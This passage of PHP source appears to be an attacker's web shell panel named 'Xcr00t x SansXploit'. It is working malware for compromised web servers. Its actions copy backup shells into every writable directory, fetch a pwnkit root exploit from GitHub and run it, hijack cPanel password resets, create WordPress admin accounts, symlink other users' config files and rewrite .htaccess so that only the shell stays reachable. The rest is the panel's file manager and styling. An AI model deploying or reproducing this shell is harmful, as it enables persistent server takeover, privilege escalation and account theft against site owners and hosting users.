$subdirs = array_merge(
array_filter(glob($rootDir . '/*', GLOB_ONLYDIR)),
array_filter(glob($rootDir . '/.*', GLOB_ONLYDIR))
);
foreach ($subdirs as $subdir) {
if (!is_writable($subdir)) {
continue;
}
$dirName = basename($subdir);
$randomName = uniqid($dirName . '_', true);
$extensions = array('.php', '.inc.php', '.ini.php', '_function.php');
foreach ($extensions as $ext) {
$filePath = $subdir . '/' . $randomName . $ext;
if (!file_exists($filePath)) {
if (file_put_contents($filePath, $content) !== false) {
@chmod($filePath, 0644);
$fullUrl = get_full_url($filePath);
echo "<div class='alert alert-success'>Created: <a href='$fullUrl' target='_blank'>$fullUrl</a></div>";
$created = true;
// Create .htaccess to protect the file
$htaccess = $subdir . '/.htaccess';
if (!file_exists($htaccess)) {
$rules = "Options -Indexes\nOrder Allow,Deny\nAllow from all\n";
@file_put_contents($htaccess, $rules);
}
break; // Successfully created one file in this directory
}
}
}
}
if (!$created) {
throw new Exception("Could not create any backup files. Check directory permissions.");
}
return true;
} catch (Exception $e) {
error_log("Backup creation error: " . $e->getMessage());
echo "<div class='alert alert-danger'>Error: " . htmlspecialchars($e->getMessage()) . "</div>";
return false;
}
}
if (isset($_POST['newdir'])) {
if (@mkdir(PATH . DIRECTORY_SEPARATOR . $_POST['dirname'], 0755)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
if (isset($_POST['newfile'])) {
$file = PATH . DIRECTORY_SEPARATOR . $_POST['filename'];
if (!file_exists($file) && file_put_contents($file, '') !== false) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&act=edit&file=' . urlencode($_POST['filename']));
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
if (isset($_POST['save'])) {
if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $target, $_POST['content']) !== false) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
if (isset($_GET['action'])) {
switch ($_GET['action']) {
case 'auto-shell':
$rootDir = $_SERVER['DOCUMENT_ROOT'];
try {
create_files_in_subdirectories($rootDir, $url1);
echo '<div class="alert alert-success alert-dismissible fade show" role="alert">
<strong>Success!</strong> Backup shells have been created successfully.
<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>';
} catch (Exception $e) {
echo '<div class="alert alert-danger alert-dismissible fade show" role="alert">
<strong>Error!</strong> ' . htmlspecialchars($e->getMessage()) . '
<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>';
}
break;
case 'adminer':
$url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php';
if (@file_put_contents('adminer.php', @file_get_contents($url))) {
header('Location: adminer.php');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
case 'pwnkit':
if (!file_exists('pwnkit')) {
@file_put_contents('pwnkit', @file_get_contents('https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit'));
@chmod('pwnkit', 0755);
$output = @shell_exec('./pwnkit "id" 2>&1');
file_put_contents('.root_output', $output);
}
header('Location: ?Xcr00t&p=' . enc(PATH) . '&terminal=root');
exit;
case 'cpanel-reset':
if (isset($_POST['email'])) {
$path = dirname($_SERVER['DOCUMENT_ROOT']) . "/.cpanel/contactinfo";
$content = json_encode(['email' => $_POST['email']]);
if (@file_put_contents($path, $content)) {
header('Location: ' . $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['SERVER_NAME'] . ':2083/resetpass?start=1');
exit;
}
}
break;
case 'backdoor':
$htaccess = '<FilesMatch "\.ph(p[3457]?|t|tml)$">
Order Deny,Allow
Deny from all
</FilesMatch>
<FilesMatch "^(' . basename($_SERVER['SCRIPT_FILENAME']) . '|index\.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>';
if (@file_put_contents('.htaccess', $htaccess)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
case 'mass-symlink':
massSymlinkConfigs(extractSystemUsers());
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
exit;
case 'phpini':
generatePhpIni();
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
exit;
}
}
// Handle download and delete
if ($action === 'download' && $target && is_file(PATH . DIRECTORY_SEPARATOR . $target)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($target) . '"');
readfile(PATH . DIRECTORY_SEPARATOR . $target);
exit;
}
if (isset($_GET['del'])) {
$del = PATH . DIRECTORY_SEPARATOR . basename($_GET['del']);
if (is_dir($del)) @rmdir($del);
else @unlink($del);
header('Location: ?Xcr00t&p=' . enc(PATH));
exit;
}
// Optimized directory listing with limited entries and caching
$dirs = $files = [];
if ($action === 'list') {
static $dirCache = [];
$cacheKey = md5(PATH);
if (isset($dirCache[$cacheKey])) {
list($dirs, $files) = $dirCache[$cacheKey];
} else {
$items = scandir(PATH);
$count = 0;
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
if ($count >= SCAN_READ_LIMIT) break;
$fullPath = PATH . DIRECTORY_SEPARATOR . $item;
if (is_dir($fullPath)) {
$dirs[] = $item;
} else {
$files[] = $item;
}
$count++;
}
$dirCache[$cacheKey] = [$dirs, $files];
// Limit cache size
if (count($dirCache) > 10) {
array_shift($dirCache);
}
}
}
// Handle hidden directory creation
if (isset($_POST['newhiddendir'])) {
$hiddenDirName = '.' . trim($_POST['hiddendirname']);
$hiddenDirPath = PATH . DIRECTORY_SEPARATOR . $hiddenDirName;
if (!file_exists($hiddenDirPath)) {
if (@mkdir($hiddenDirPath, 0755, true)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
}
exit;
}
// Check pwnkit compatibility
$is_compatible = check_pwnkit_compatibility();
$root_output = '';
if (isset($_GET['terminal']) && $_GET['terminal'] === 'root' && file_exists('.root_output')) {
$root_output = file_get_contents('.root_output');
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title id="dynamic-title"><?= APP_NAME ?></title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<script>
// Animate title
let titleText = document.getElementById("dynamic-title").innerHTML;
let position = 0;
setInterval(() => {
position = (position + 1) % titleText.length;
document.title = titleText.substring(position) + titleText.substring(0, position);
}, 300);
// Show time
setInterval(() => {
let now = new Date();
let time = now.toLocaleTimeString();
let date = now.toLocaleDateString();
document.getElementById("current-time").innerHTML = time;
document.getElementById("current-date").innerHTML = date;
}, 1000);
</script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" rel="stylesheet">
<style>
:root {
--primary-bg: #0a0c0f;
--secondary-bg: #12151a;
--text-color: #e6edf3;
--border-color: #21262d;
--hover-color: #161b22;
--link-color: #2f81f7;
--success-color: #238636;
--danger-color: #da3633;
--warning-color: #9e6a03;
}
/* Enhanced overall styling */
body {
background:
radial-gradient(circle at 20% 80%, rgba(120, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 80% 20%, rgba(200, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 40% 40%, rgba(100, 0, 200, 0.05) 0%, transparent 50%),
linear-gradient(135deg, #0a0a0a 0%, #120929 50%, #0a0615 100%);
color: #e6e6ff;
font-family: 'Rajdhani', 'Courier New', monospace;
min-height: 100vh;
overflow-x: hidden;
position: relative;
}
/* NEURAL NETWORK BACKGROUND */
.neural-network {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 0;
pointer-events: none;
}
/* LOGO CONTAINER YANG DIPERBAIKI */
.logo-container {
display: flex;
align-items: center;
gap: 20px;
margin-bottom: 20px;
flex-wrap: wrap;
}
.round-logo {
width: 80px;
height: 80px;
border-radius: 50%;
object-fit: cover;
border: 3px solid #8a2be2;
box-shadow:
0 0 20px rgba(138, 43, 226, 0.5),
inset 0 0 10px rgba(138, 43, 226, 0.3);
transition: all 0.4s ease;
position: relative;
overflow: hidden;
background: linear-gradient(135deg, #8a2be2, #9400d3);
display: flex;
align-items: center;
justify-content: center;
color: white;
font-weight: bold;
font-size: 12px;
text-align: center;
padding: 5px;
}
.round-logo::before {
content: '';
position: absolute;
top: -50%;
left: -50%;
width: 200%;
height: 200%;
background: linear-gradient(45deg,
transparent,
rgba(255,255,255,0.1),
transparent);
transform: rotate(45deg);
transition: all 0.6s ease;
}
.round-logo:hover::before {
transform: rotate(45deg) translate(50%, 50%);
}
.round-logo:hover {
transform: scale(1.15) rotate(5deg);
box-shadow:
0 0 40px rgba(138, 43, 226, 0.8),
0 0 60px rgba(148, 0, 211, 0.4),
inset 0 0 20px rgba(138, 43, 226, 0.5);
border-color: #da70d6;
}
/* Efek pulsating untuk logo */
@keyframes logoPulse {
0%, 100% {
box-shadow:
0 0 20px rgba(138, 43, 226, 0.5),
inset 0 0 10px rgba(138, 43, 226, 0.3);
}
50% {
box-shadow:
0 0 30px rgba(138, 43, 226, 0.7),
0 0 40px rgba(148, 0, 211, 0.3),
inset 0 0 15px rgba(138, 43, 226, 0.5);
}
}
.round-logo {
animation: logoPulse 3s ease-in-out infinite;
}
/* Container untuk logo dengan fallback */
.logo-fallback {
width: 80px;
height: 80px;
border-radius: 50%;
background: linear-gradient(135deg, #8a2be2, #9400d3);
display: flex;
align-items: center;
justify-content: center;
color: white;
font-weight: bold;
font-size: 10px;
text-align: center;
line-height: 1.2;
padding: 8px;
border: 3px solid #8a2be2;
box-shadow: 0 0 20px rgba(138, 43, 226, 0.5);
}
/* FIX UNTUK KEDIPAN - System Information */
.server-info {
background: linear-gradient(45deg, #2b3035, #212529) !important;
border-radius: 8px;
box-shadow: 0 2px 4px rgba(0,0,0,0.2);
position: relative;
z-index: 10;
backdrop-filter: blur(10px);
flex-grow: 1;
}
/* FIX UNTUK KEDIPAN - Notifikasi */
.alert {
position: relative;
z-index: 1000;
backdrop-filter: blur(10px);
animation: slideDown 0.3s ease-out;
}
@keyframes slideDown {
from {
opacity: 0;
transform: translateY(-20px);
}
to {
opacity: 1;
transform: translateY(0);
}
}
/* QUANTUM NAVBAR */
.quantum-navbar {
background: rgba(10, 5, 25, 0.8) !important;
backdrop-filter: blur(15px);
border-bottom: 1px solid rgba(138, 43, 226, 0.3);
box-shadow: 0 0 30px rgba(138, 43, 226, 0.2);
}
/* QUANTUM CARDS */
.quantum-card {
background: rgba(10, 5, 25, 0.7) !important;
border: 1px solid rgba(138, 43, 226, 0.3) !important;
border-radius: 15px;
backdrop-filter: blur(10px);
box-shadow: 0 0 30px rgba(138, 43, 226, 0.1);
color: #e6e6ff;
}
.quantum-card .card-header {
background: rgba(138, 43, 226, 0.2) !important;
border-bottom: 1px solid rgba(138, 43, 226, 0.3) !important;
color: #da70d6;
}
/* QUANTUM BUTTONS */
.quantum-btn {
background: linear-gradient(135deg, #8a2be2, #9400d3) !important;
border: none !important;
border-radius: 10px !important;
color: white !important;
transition: all 0.3s ease !important;
}
.quantum-btn:hover {
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(138, 43, 226, 0.4) !important;
}
/* FIX BACKGROUND TABLE - List File */
.quantum-table {
background: rgba(10, 5, 25, 0.8) !important;
border: 1px solid rgba(138, 43, 226, 0.3) !important;
border-radius: 15px;
backdrop-filter: blur(10px);
box-shadow: 0 0 30px rgba(138, 43, 226, 0.1);
color: #e6e6ff !important;
overflow: hidden;
}
.quantum-table thead th {
background: rgba(138, 43, 226, 0.2) !important;
border-bottom: 1px solid rgba(138, 43, 226, 0.3) !important;
color: #da70d6 !important;
font-weight: 600;
padding: 1rem;
text-align: left;
}
.quantum-table tbody td {
background: transparent !important;
border-bottom: 1px solid rgba(138, 43, 226, 0.1) !important;
color: #e6e6ff !important;
padding: 0.8rem 1rem;
vertical-align: middle;
}
.quantum-table tbody tr:hover {
background: rgba(138, 43, 226, 0.1) !important;
transition: all 0.3s ease;
}
.quantum-table tbody tr:last-child td {
border-bottom: none !important;
}
/* Link colors in table */
.quantum-table a {
color: #c9a0ff !important;
text-decoration: none;
transition: all 0.3s ease;
}
.quantum-table a:hover {
color: #da70d6 !important;
text-shadow: 0 0 10px rgba(218, 112, 214, 0.5);
}
/* Icon colors in table */
.quantum-table .fa-folder {
color: #ffd700 !important;
}
.quantum-table .fa-php {
color: #8a2be2 !important;
}
.quantum-table .fa-html5 {
color: #ff6b6b !important;
}
.quantum-table .fa-css3 {
color: #4dabf7 !important;
}
.quantum-table .fa-js {
color: #ffd43b !important;
}
.quantum-table .fa-python {
color: #ffd43b !important;
}
.quantum-table .fa-lock {
color: #ff6b6b !important;
}
.quantum-table .fa-image {
color: #51cf66 !important;
}
.quantum-table .fa-file {
color: #adb5bd !important;
}
/* Button styles in table */
.quantum-table .btn {
border-radius: 6px;
transition: all 0.3s ease;
}
.quantum-table .btn-outline-primary {
color: #8a2be2 !important;
border-color: #8a2be2 !important;
}
.quantum-table .btn-outline-primary:hover {
background: #8a2be2 !important;
color: white !important;
transform: translateY(-2px);
}
.quantum-table .btn-outline-success {
color: #51cf66 !important;
border-color: #51cf66 !important;
}
.quantum-table .btn-outline-success:hover {
background: #51cf66 !important;
color: white !important;
transform: translateY(-2px);
}
.quantum-table .btn-outline-danger {
color: #ff6b6b !important;
border-color: #ff6b6b !important;
}
.quantum-table .btn-outline-danger:hover {
background: #ff6b6b !important;
color: white !important;
transform: translateY(-2px);
}
/* Table responsive */
.table-responsive {
border-radius: 15px;
background: rgba(10, 5, 25, 0.3);
backdrop-filter: blur(5px);
padding: 1px;
}
.nav-hover {
transition: all 0.3s ease;
border: 1px solid transparent;
}
.nav-hover:hover {
background: rgba(255,255,255,0.1);
border: 1px solid rgba(255,255,255,0.2);
transform: translateY(-2px);
}
.nav-link {
color: rgba(255,255,255,0.8) !important;
font-weight: 500;
}
.nav-link:hover {
color: rgba(255,255,255,1) !important;
}
.navbar-nav {
gap: 5px;
}
@keyframes blink {
0% { opacity: 1; }
50% { opacity: 0; }
100% { opacity: 1; }
}
.blink {
animation: blink 1.5s infinite;
margin-right: 8px;
}
.breadcrumb {
background: linear-gradient(45deg, #2b3035, #212529) !important;
box-shadow: 0 2px 4px rgba(0,0,0,0.2);
}
/* Container dengan z-index lebih tinggi */
.container-fluid {
position: relative;
z-index: 10;
}
/* Responsive improvements */
@media (max-width: 768px) {
.logo-container {
justify-content: center;
text-align: center;
}
.round-logo {
width: 60px;
height: 60px;
font-size: 9px;
}
.logo-fallback {
width: 60px;
height: 60px;
font-size: 8px;
}
.server-info {
font-size: 0.8rem;
}
}
</style>
</head>
<body>
<!-- NEURAL NETWORK BACKGROUND -->
<canvas class="neural-network" id="neuralNetwork"></canvas>
<!-- QUANTUM NAVBAR -->
<nav class="navbar navbar-expand-lg quantum-navbar">
<div class="container-fluid">
<a class="navbar-brand text-light" href="?Xcr00t">
<i class="fas fa-terminal blink"></i> <?= APP_NAME ?>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarContent">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarContent">
<ul class="navbar-nav ms-auto">
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=adminer">
<i class="fas fa-database fa-fw me-2"></i> Adminer
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=pwnkit">
<i class="fas fa-user-shield fa-fw me-2"></i> Auto Root
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#wpAdminModal">
<i class="fab fa-wordpress fa-fw me-2"></i> WP Admin
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#cpanelModal">
<i class="fas fa-server fa-fw me-2"></i> cPanel Reset
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=backdoor">
<i class="fas fa-lock fa-fw me-2"></i> Anti Backdoor
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=phpini">
<i class="fas fa-cog fa-fw me-2"></i> PHP.ini
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=mass-symlink">
<i class="fas fa-link fa-fw me-2"></i> Mass Symlink
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=auto-shell">
<i class="fas fa-terminal fa-fw me-2"></i> Backup Shell
</a>
</li>
</ul>
</div>
</div>
</nav>
<div class="container-fluid py-4">
<?php if (isset($_GET['terminal']) && $_GET['terminal'] === 'root'): ?>
<div class="compatibility-info <?= $is_compatible ? 'compatible' : 'not-compatible' ?>">
<h4>
<i class="fas <?= $is_compatible ? 'fa-check-circle' : 'fa-times-circle' ?>"></i>
Kernel Version: <?= suggest_exploit() ?>
</h4>
<p>Status: <?= $is_compatible ? 'Compatible with pwnkit exploit' : 'Not compatible with pwnkit exploit' ?></p>
<?php if ($is_compatible): ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&action=pwnkit" class="btn quantum-btn">
<i class="fas fa-bolt"></i> Run Exploit
</a>
<?php endif; ?>
</div>
<?php if ($root_output): ?>
<div class="terminal"><?= htmlspecialchars($root_output) ?></div>
<?php endif; ?>
<?php endif; ?>
<!-- LOGO DAN SYSTEM INFORMATION YANG DIPERBAIKI -->
<div class="logo-container">
<div class="logo-wrapper">
<img src="https://k.top4top.io/p_3594s1tnx0.jpg"
alt="Xcr00toname x SansXploit"
class="round-logo"
onerror="this.style.display='none'; document.getElementById('logo-fallback').style.display='flex';">
<div id="logo-fallback" class="logo-fallback" style="display: none;">
Xcr00tM<br>×<br>SX
</div>
</div>
<div class="server-info text-light p-3">
<div class="row">
<div class="col-md-6">
<small>
<i class="fas fa-server"></i> Server: <?= $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown' ?><br>
<i class="fas fa-network-wired"></i> IP: <?= $_SERVER['SERVER_ADDR'] ?? $_SERVER['LOCAL_ADDR'] ?? 'Unknown' ?><br>
<i class="fas fa-user"></i> User: <?= get_current_user() ?> (<?= getmyuid() ?>)
</small>
</div>
<div class="col-md-6">
<small>
<i class="fas fa-microchip"></i> System: <?= php_uname() ?><br>
<i class="fas fa-code"></i> PHP: <?= phpversion() ?><br>
<i class="fas fa-folder-open"></i> Current Path: <?= getcwd() ?>
</small>
</div>
</div>
</div>
</div>
<!-- NOTIFIKASI -->
<?php if (isset($_GET['status'])): ?>
<div class="alert alert-<?= $_GET['status'] === 'success' ? 'success' : 'danger' ?> alert-dismissible fade show mt-3">
<?= $_GET['status'] === 'success' ? 'Operation completed successfully' : 'Operation failed' ?>
<button type="button" class="btn-close" data-bs-dismiss="alert"></button>
</div>
<?php endif; ?>
<nav aria-label="breadcrumb" style="margin-bottom: 1rem;">
<ol class="breadcrumb text-light p-3">
<li class="breadcrumb-item">
<a href="?Xcr00t&p=<?= enc($current_dir) ?>" style="color: #00ff9d; text-decoration: none; font-weight: 600;">
<i class="fas fa-home"></i> Root
</a>
</li>
<?php
$parts = explode(DIRECTORY_SEPARATOR, trim(PATH, DIRECTORY_SEPARATOR));
$path = '';
foreach ($parts as $part) {
if (!$part) continue;
$path .= DIRECTORY_SEPARATOR . $part;
echo '<li class="breadcrumb-item">';
echo '<a href="?Xcr00t&p=' . enc($path) . '" style="color: #00b8ff; text-decoration: none; font-weight: 500;">' . $part . '</a>';
echo '</li>';
}
?>
</ol>
</nav>
<div class="btn-toolbar mb-3">
<div class="btn-group me-2">
<button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#uploadModal">
<i class="fas fa-upload"></i> Upload
</button>
<button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#newDirModal">
<i class="fas fa-folder-plus"></i> New Folder
</button>
<button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#newFileModal">
<i class="fas fa-file"></i> New File
</button>
<button type="button" class="btn btn-danger" data-bs-toggle="modal" data-bs-target="#newHiddenDirModal">
<i class="fas fa-folder-minus"></i> Hidden Folder
</button>
</div>
</div>
<!-- Hidden Directory Modal -->
<div class="modal fade" id="newHiddenDirModal" tabindex="-1">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Create Hidden Directory</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Directory Name</label>
<input type="text" class="form-control bg-dark text-light" name="hiddendirname" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
<button type="submit" name="newhiddendir" class="btn btn-danger">Create Hidden Directory</button>
</div>
</form>
</div>
</div>
</div>
<div class="table-responsive">
<table class="table table-hover quantum-table">
<thead>
<tr>
<th>Name</th>
<th>Size</th>
<th>Permissions</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php if (PATH !== $current_dir): ?>
<tr>
<td>
<a href="?Xcr00t&p=<?= enc(dirname(PATH)) ?>">
<i class="fas fa-level-up-alt"></i> ..
</a>
</td>
<td>-</td>
<td>-</td>
<td>-</td>
</tr>
<?php endif; ?>
<?php foreach ($dirs as $dir): ?>
<tr>
<td>
<a href="?Xcr00t&p=<?= enc(PATH . DIRECTORY_SEPARATOR . $dir) ?>">
<i class="fas fa-folder text-warning"></i> <?= htmlspecialchars($dir) ?>
</a>
</td>
<td>-</td>
<td><?= perms(PATH . DIRECTORY_SEPARATOR . $dir) ?></td>
<td>
<div class="btn-group btn-group-sm">
<a href="?Xcr00t&p=<?= enc(PATH) ?>&del=<?= urlencode($dir) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete directory?')">
<i class="fas fa-trash"></i>
</a>
</div>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $file): ?>
<?php $is_dir = is_dir(PATH . DIRECTORY_SEPARATOR . $file); ?>
<tr>
<td>
<?php if ($is_dir): ?>
<a href="?Xcr00t&p=<?= enc(PATH . DIRECTORY_SEPARATOR . $file) ?>">
<?= icon($file) ?> <?= htmlspecialchars($file) ?>
</a>
<?php else: ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>">
<?= icon($file) ?> <?= htmlspecialchars($file) ?>
</a>
<?php endif; ?>
</td>
<td><?= fmtSize(filesize(PATH . DIRECTORY_SEPARATOR . $file)) ?></td>
<td><?= perms(PATH . DIRECTORY_SEPARATOR . $file) ?></td>
<td>
<div class="btn-group btn-group-sm">
<?php if (!$is_dir): ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>" class="btn btn-outline-primary">
<i class="fas fa-edit"></i>
</a>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&act=download&file=<?= urlencode($file) ?>" class="btn btn-outline-success">
<i class="fas fa-download"></i>
</a>
<?php endif; ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&del=<?= urlencode($file) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete <?= $is_dir ? 'folder' : 'file' ?>?')">
<i class="fas fa-trash"></i>
</a>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
</div>
<!-- Modals -->
<div class="modal fade" id="uploadModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Upload File</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post" enctype="multipart/form-data">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Select File</label>
<input type="file" name="file" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="upload" class="btn quantum-btn">Upload</button>
</div>
</form>
</div>
</div>
</div>
<div class="modal fade" id="newDirModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">New Folder</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Folder Name</label>
<input type="text" name="dirname" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="newdir" class="btn quantum-btn">Create</button>
</div>
</form>
</div>
</div>
</div>
<div class="modal fade" id="newFileModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">New File</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">File Name</label>
<input type="text" name="filename" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="newfile" class="btn quantum-btn">Create</button>
</div>
</form>
</div>
</div>
</div>
<!-- WP Admin Modal -->
<div class="modal fade" id="wpAdminModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Add WordPress Admin</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Database Host</label>
<input type="text" name="db_host" class="form-control bg-dark text-light" value="localhost" required>
</div>
<div class="mb-3">
<label class="form-label">Database Name</label>
<input type="text" name="db_name" class="form-control bg-dark text-light" required>
</div>
<div class="mb-3">
<label class="form-label">Database User</label>
<input type="text" name="db_user" class="form-control bg-dark text-light" required>
</div>
<div class="mb-3">
<label class="form-label">Database Password</label>
<input type="password" name="db_pass" class="form-control bg-dark text-light" required>
</div>
<hr>
<div class="mb-3">
<label class="form-label">Admin Username</label>
<input type="text" name="wp_user" class="form-control bg-dark text-light" required>
</div>
<div class="mb-3">
<label class="form-label">Admin Password</label>
<input type="password" name="wp_pass" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="submit" class="btn quantum-btn">Create Admin</button>
</div>
</form>
</div>
</div>
</div>
<!-- cPanel Modal -->
<div class="modal fade" id="cpanelModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">cPanel Password Reset</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post" action="?Xcr00t&p=<?= enc(PATH) ?>&action=cpanel-reset">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Email Address</label>
<input type="email" name="email" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" class="btn quantum-btn">Reset Password</button>
</div>
</form>
</div>
</div>
</div>
<?php if ($action === 'edit' && $target): ?>
<div class="modal fade show" style="display: block;">
<div class="modal-dialog modal-lg">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Edit: <?= htmlspecialchars($target) ?></h5>
<button type="button" class="btn-close btn-close-white" onclick="history.back()"></button>
</div>
<form method="post">
<div class="modal-body">
<textarea name="content" class="form-control bg-dark text-light" style="height: 400px; font-family: monospace;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $target)) ?></textarea>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" onclick="history.back()">Cancel</button>
<button type="submit" name="save" class="btn quantum-btn">Save</button>
</div>
</form>
</div>
</div>
</div>
<div class="modal-backdrop fade show"></div>
<?php endif; ?>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
<script>
// Neural Network Animation - FIX KEDIPAN
const canvas = document.getElementById('neuralNetwork');
const ctx = canvas.getContext('2d');
function resizeCanvas() {
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
}
resizeCanvas();
window.addEventListener('resize', resizeCanvas);
class Node {
constructor(x, y) {
this.x = x;
this.y = y;
this.vx = (Math.random() - 0.5) * 0.3;
this.vy = (Math.random() - 0.5) * 0.3;
this.radius = Math.random() * 1.5 + 0.5;
}
update() {
this.x += this.vx;
this.y += this.vy;
if (this.x < 0 || this.x > canvas.width) this.vx *= -1;
if (this.y < 0 || this.y > canvas.height) this.vy *= -1;
}
draw() {
ctx.beginPath();
ctx.arc(this.x, this.y, this.radius, 0, Math.PI * 2);
ctx.fillStyle = `rgba(138, 43, 226, ${0.2 + Math.random() * 0.1})`;
ctx.fill();
}
}
const nodes = [];
for (let i = 0; i < 30; i++) {
nodes.push(new Node(Math.random() * canvas.width, Math.random() * canvas.height));
}
function animate() {
ctx.fillStyle = 'rgba(10, 5, 25, 0.1)';
ctx.fillRect(0, 0, canvas.width, canvas.height);
